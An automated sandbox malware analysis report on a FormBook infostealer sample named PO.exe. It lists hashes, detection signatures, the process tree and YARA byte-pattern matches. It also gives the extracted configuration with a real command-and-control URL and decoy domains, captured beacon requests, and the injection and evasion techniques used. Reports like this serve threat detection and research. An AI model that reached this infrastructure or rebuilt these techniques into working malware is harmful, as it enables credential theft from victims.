
Analysis Report PO.exe

Overview

General Information

Sample Name: PO.exe
Analysis ID: 383905
MD5: 665cb19601850467af3ee7d9fd0e0350
SHA1: 8ac40ef9fa5100a39b14258d8d8e562cefd7202c
SHA256: f3147300f9248e07ffd3a1b7131bed4febad8b0a88eeda27e606f36d04ff1340
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO.exe (PID: 5584 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 665CB19601850467AF3EE7D9FD0E0350)
    • PO.exe (PID: 5536 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 665CB19601850467AF3EE7D9FD0E0350)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 3980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 1320 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.c-voyageinc.com/r4ei/"], "decoy": ["8clintonstreet.com", "sherylhotpepperblends.com", "eucham.asia", "earnestqueen.com", "vstexchange.com", "theoutofbounds.com", "allincursive.com", "getgenevieved.com", "commonlawpeoplesassembly.net", "brideclubstorerastreamento.com", "cngelectricaldesign.com", "mizmaleather.com", "nicolabenge.com", "babyboxbuy.com", "xaydungquan9.com", "hclifechurch.com", "cwyxonlp.icu", "inocentkidd.com", "worldhw.com", "soul.exchange", "garshbedmi.info", "hayratindonesia.com", "optimummedical-uk.com", "jagocopywriter.com", "loandong.com", "tnacharters.com", "rdj-cpa.com", "nklwmb.com", "baykusbaskimerkezi.xyz", "websiteworlda-z.com", "gulumsekoop.xyz", "artforthebayarea.com", "hkafrfudl.icu", "thekhufureign.com", "stanfordcodingtutor.com", "puoynios.website", "saearners.info", "epipdfhany.com", "cowboycooloutfitters.net", "therealrefinery.com", "royal-english-academy.com", "dante.report", "montonvuraeditted.space", "webuytampabayhouses.com", "phorice.com", "juxrams.info", "francisboyrd.com", "edifice-base.com", "shjzly.com", "frisdrank.deals", "cannajointn.com", "dianshi.ink", "droneserviceshouston.com", "swaymontoya.com", "omvvv.com", "yourherogarden.net", "areenaarora.com", "complex-kokukenzyo.com", "minyakgelici.com", "municipiodeanton.net", "opimexico.com", "xgame.online", "squrl.network", "bayleafdenver.info"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.PO.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.PO.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.2.PO.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.PO.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed in the Malware Configuration section above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll | ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: PO.exe | ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: 10.2.explorer.exe.51af834.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.PO.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.PO.exe.2670000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.PO.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: PO.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: explorer.pdbUGP | source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: PO.exe, 00000000.00000003.234541643.000000001EFF0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.293490936.0000000000B2F000.00000040.00000001.sdmp, explorer.exe, 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PO.exe, explorer.exe
Source: Binary string: C:\xampp\htdocs\Cryptor\1a839a6cf4cc488e888465f9ce8aa846\Loader\Loader\Release\d18g7xa93.pdb | source: PO.exe, 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp, 5t94xwjj.dll.0.dr
Source: Binary string: explorer.pdb | source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\PO.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\PO.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.c-voyageinc.com/r4ei/
Source: global traffic | HTTP traffic detected: GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1 Host: www.websiteworlda-z.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1 Host: www.phorice.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 44.227.76.166
Source: C:\Windows\explorer.exe | Code function: 3_2_06D537A2 getaddrinfo,setsockopt,recv,
Source: unknown | DNS traffic detected: queries for: www.cwyxonlp.icu
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 10:10:12 GMT Server: Apache Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.websiteworlda-z.com Port 80</address></body></html>
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000A.00000002.504257510.000000000569F000.00000004.00000001.sdmp | String found in binary or memory: http://phorice.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00419FE0 NtReadFile,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00419F2B NtCreateFile,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00419FDA NtReadFile,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00419F82 NtReadFile,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A795D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A798A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79820 NtEnumerateKey,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A7B040 NtSuspendThread,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A799D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79950 NtQueueApcThread,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79A10 NtQuerySection,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A7A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79B00 NtSetValueKey,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A795F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A7AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\PO.exe | Code function: 1_2_00A79560 NtWriteFile,
